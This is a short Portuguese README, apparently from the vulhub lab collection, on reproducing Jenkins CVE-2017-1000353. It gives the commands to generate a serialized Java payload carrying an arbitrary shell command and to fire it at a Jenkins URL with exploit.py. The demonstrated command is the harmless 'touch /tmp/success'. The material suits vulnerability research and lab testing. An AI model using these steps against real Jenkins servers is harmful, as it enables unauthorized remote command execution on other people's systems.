
jenkins CVE-2017-1000353 POC
Como reproduzir o Jenkins CVE-2017-1000353?
Clone este repositório, use o payload pré-construído jenkins_poc.ser com o seguinte comando:
python exploit.py http://your-ip:8080 jenkins_poc.ser
Então o comando touch /tmp/success será executado.
Importante: A geração do payload depende da versão do Java. Foi testado com sucesso em openjdk:8u292. Outras versões do Java podem não funcionar corretamente para geração e exploração do payload.
jenkins_poc.ser?Baixe o CVE-2017-1000353-SNAPSHOT-all.jar.
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
Se estiver usando Docker, você pode usar o seguinte comando para garantir compatibilidade:
docker run --rm -v $(pwd):/work -w /work openjdk:8u292 java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353